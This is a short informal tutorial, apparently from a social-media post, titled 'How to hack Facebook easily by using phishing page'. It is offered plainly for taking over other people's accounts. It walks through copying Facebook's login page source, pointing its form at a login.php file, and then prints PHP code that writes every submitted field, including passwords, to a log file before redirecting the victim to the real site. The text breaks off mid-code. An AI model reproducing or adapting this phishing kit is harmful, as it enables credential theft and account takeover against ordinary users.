HOW TO HACK FACEBOOK EASILY BY USING PHISHING PAGE
1) HOW TO HACK FACEBOOK EASILY BY USING PHISHING PAGE Already we have discussed about different methods to hack facebook : One of The easiest way to hack any account is # Phishing .!!!!!! pacman emoticon pacman emoticon devil emoticon Ok, let's get start our session wink emoticon pacman emoticon pacman emoticon 1. First Open the website of which you want to make phisher/ fake login page. for Example: www.facebook.com 2. Now right click and select 'page source'. 3.Copy the whole text and paste it in a notepad, Now search for "action = " and change following address to login.php. 4. After editing save the page as "index.html" 5. Now its time to create login.php . Open notepad and copy/paste this below code and save it as login.php : header ('Location: http://facebook.com/login.php '); $handle = fopen("log.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, ...